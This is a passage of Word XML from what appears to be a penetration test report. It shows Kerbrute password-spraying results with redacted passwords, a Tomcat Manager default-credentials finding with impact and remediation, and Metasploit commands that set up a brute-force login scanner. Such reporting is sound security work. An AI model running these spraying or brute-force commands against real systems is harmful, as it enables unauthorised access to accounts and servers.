            </w:r>
            <w:r w:rsidR="005345C1">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;PASSWORD REDACTED&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F829BD" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6265E6CA" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    __             __               __     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A53B6E2" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">   / /_____  _____/ /_  _______  __/ /____ </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="789C04B1" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="146CFF9A" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> / ,&lt; /  __/ /  / /_/ / /  / /_/ / /_/  __/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34966FD1" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A4C7999" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="32E19FCD" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Version: v1.0.3 (9dad6e1) - 05/31/22 - Ronnie Flathers @ropnop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14BC3E50" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14AF3771" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2022/05/31 15:55:24 &gt;  Using KDC(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20EE9C41" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">2022/05/31 15:55:24 &gt;  </w:t>
            </w:r>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>192.168.195.204:88</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CED37E9" w14:textId="77777777" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02334350" w14:textId="50D3D8CE" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2022/05/31 15:55:24 &gt;  [+] VALID LOGIN:</w:t>
            </w:r>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> pramirez@INLANEFREIGHT.LOCAL:&lt;PASSWORD REDACTED&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="334E9D70" w14:textId="6A313372" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2022/05/31 15:55:24 &gt;  [+] VALID LOGIN:</w:t>
            </w:r>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> asmith@INLANEFREIGHT.LOCAL:&lt;PASSWORD REDACTED&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="581B73CA" w14:textId="2CEA4B11" w:rsidR="005345C1" w:rsidRPr="005345C1" w:rsidRDefault="005345C1" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17761345" w14:textId="038E0A85" w:rsidR="007046B0" w:rsidRDefault="005345C1" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005345C1">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2022/05/31 15:55:24 &gt;  Done! Tested 1,974 logins (2 successes) in 0.161 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24420CF4" w14:textId="30346AC5" w:rsidR="007046B0" w:rsidRDefault="007046B0" w:rsidP="007046B0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FD16E9">
        <w:t>Password Spraying – Kerbrute Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9F8F1" w14:textId="77777777" w:rsidR="007046B0" w:rsidRDefault="007046B0">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35429A79" w14:textId="55B7DEC0" w:rsidR="000E6FF6" w:rsidRPr="00520B63" w:rsidRDefault="003A7C6E" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="FindingTitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tomcat Manager Weak/Default Credentials</w:t>
      </w:r>
      <w:r w:rsidR="000E6FF6" w:rsidRPr="006372B6">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="000E6FF6" w:rsidRPr="006372B6">
        <w:rPr>
          <w:color w:val="FF3E3E"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="11016" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2358"/>
        <w:gridCol w:w="8658"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E6FF6" w:rsidRPr="00B96066" w14:paraId="4EF9113C"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572CF118" w14:textId="77777777" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="000E6FF6" w:rsidP="006B257A">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7229F717" w14:textId="604EAEDB" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="006B257A">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35" w:history="1">
              <w:r w:rsidR="003A7C6E" w:rsidRPr="007D1F5C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>CWE-521</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E6FF6" w:rsidRPr="00B96066" w14:paraId="5D17D4A3"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44170995" w14:textId="77777777" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="000E6FF6" w:rsidP="006B257A">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D76A5A" w14:textId="34B35DE6" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="00AB2409" w:rsidP="006B257A">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9.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E6FF6" w:rsidRPr="00B96066" w14:paraId="023A33D0"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7645582A" w14:textId="77777777" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="000E6FF6" w:rsidP="006B257A">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Description (Incl. Root Cause)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D543320" w14:textId="0A0708ED" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="002F11DB" w:rsidP="002F11DB">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7D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">An Apache Tomcat Server was found that was exposing the </w:t>
            </w:r>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:i/>
              </w:rPr>
              <w:t>Tomcat Manager</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> login URL and using weak/default credentials to enter the </w:t>
            </w:r>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:i/>
              </w:rPr>
              <w:t>Manager</w:t>
            </w:r>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (admin) backend.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E6FF6" w:rsidRPr="00B96066" w14:paraId="5158DCCC"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0DE2563B" w14:textId="77777777" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="000E6FF6" w:rsidP="006B257A">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Security Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F12DA98" w14:textId="67CB818E" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="007D1F5C" w:rsidP="006B257A">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>An attacker who gains access to the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:color w:val="0E101A"/>
              </w:rPr>
              <w:t>Tomcat Manager</w:t>
            </w:r>
            <w:r>
              <w:t> area can upload a malicious application via a WAR file containing custom JSP code. This code can be used to run arbitrary commands on the underlying server in the context of the service account that the Apache Tomcat instance runs under. This Tomcat instance was running under a local service account assigned privileges that can be leveraged to escalate to the all-powerful NT AUTHORITY\SYSTEM account and gain complete control over the server, potentially gaining access to credentials and other sensitive data. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E6FF6" w:rsidRPr="00B96066" w14:paraId="75D104E9"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591B674F" w14:textId="77777777" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="000E6FF6" w:rsidP="006B257A">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Affected Host(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27EACD41" w14:textId="1D7D15C7" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="002F11DB" w:rsidP="002F11DB">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>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7D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>192.168.195.205 (8080/TCP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E6FF6" w:rsidRPr="00B96066" w14:paraId="7BD0EEB6"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EB657BA" w14:textId="77777777" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="000E6FF6" w:rsidP="006B257A">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="527C1BD2" w14:textId="77777777" w:rsidR="007D1F5C" w:rsidRPr="007D1F5C" w:rsidRDefault="007D1F5C" w:rsidP="007D1F5C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:spacing w:before="120"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:t>Restrict access to the Tomcat Manager URL to either localhost or only select IP addresses if this URL does need to be accessed remotely by administrators. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645068CA" w14:textId="6EA0A75F" w:rsidR="002F11DB" w:rsidRPr="007D1F5C" w:rsidRDefault="007D1F5C" w:rsidP="007D1F5C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:spacing w:before="120"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:t>Change the default administrator account name to something unique and set a strong, randomized password that does not appear in any wordlists as the Tomcat Manager page uses Basic Authentication, which has no inherent protections against password brute-forcing attacks. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E6FF6" w:rsidRPr="00B96066" w14:paraId="7FB65BB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1962BA73" w14:textId="77777777" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="000E6FF6" w:rsidP="006B257A">
            <w:pPr>
              <w:spacing w:before="120"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>External References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8658" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B978AD7" w14:textId="0FE60880" w:rsidR="000E6FF6" w:rsidRPr="007D1F5C" w:rsidRDefault="00F60579" w:rsidP="006B257A">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36" w:history="1">
              <w:r w:rsidR="002F11DB" w:rsidRPr="007D1F5C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cstheme="minorHAnsi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1078/001/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="002F11DB" w:rsidRPr="007D1F5C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57DE63A4" w14:textId="77777777" w:rsidR="000E6FF6" w:rsidRDefault="000E6FF6" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="EvidencePreamble"/>
      </w:pPr>
      <w:r>
        <w:t>Finding Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F68CE23" w14:textId="6665AD87" w:rsidR="00C32C65" w:rsidRDefault="00C32C65" w:rsidP="000E6FF6">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setting up the Metasploit auxiliary </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="004B0583">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>scanner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> to brute-force Tomcat manager usernames and passwords.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E6FF6" w14:paraId="5F73EDE0" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF7ECF0" w14:textId="77777777" w:rsidR="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>use auxiliary/scanner/http/tomcat_mgr_login</w:t>
            </w:r>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6804C57F" w14:textId="0E497E7E" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">msf6 auxiliary(scanner/http/tomcat_mgr_login) &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>set rhosts 192.168.195.205</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48397615" w14:textId="144EFC28" w:rsidR="00A85D5C" w:rsidRPr="00A85D5C" w:rsidRDefault="00A85D5C" w:rsidP="004539C5">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>msf6 auxiliary(scanner/http/tomcat_mgr_lo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">gin) &gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00A85D5C">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>set STOP_ON_SUCCESS true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D7999F1" w14:textId="5F18E5FF" w:rsidR="000E6FF6" w:rsidRDefault="004B0583" w:rsidP="004B0583">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
